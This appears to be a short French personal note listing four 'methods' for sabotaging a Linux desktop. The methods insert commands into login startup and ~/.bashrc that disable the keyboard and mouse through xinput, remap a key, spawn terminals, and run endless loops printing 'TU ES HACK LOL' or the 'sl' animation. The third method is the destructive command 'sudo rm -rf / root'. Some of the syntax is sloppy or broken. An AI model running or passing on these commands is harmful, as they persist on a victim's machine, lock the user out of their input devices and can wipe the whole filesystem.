premiere Methode :


dans Start application :

créer une variable (terminal) qui ouvre un terminal a chaque login
exo-open --launch TerminalEmulator

dans le bashrc : sudo nano ~/bash.rc 
-> sh train.sh
xinput disable 12
xinput disable 11
train.sh = xmodmap -e 'keycode 64='
while true 
do
    sl
done

-------------------------------------------------------

deuxieme Method : 

Modification du fichier qui permet de lancer une commande dès qu'un terminal s'ouvre.
nano ~/.bashrc


Boucle infini qui lance un processus 
command :
while :; do echo "TU ES HACK LOL"; sleep;

---------------------------------------------------------

troisieme Method :

Détruire le fichier racine
Command : 

sudo rm -rf / root

-------------------------------------------------------

quatrieme Method :

créer une variable (terminal) qui ouvre un terminal a chaque login
exo-open --launch TerminalEmulator

mettre également dans ~/bashrc :
xinput disable 12
xinput disable 11
xmodmap -e 'keycode 64='
exo-open --launch TerminalEmulator
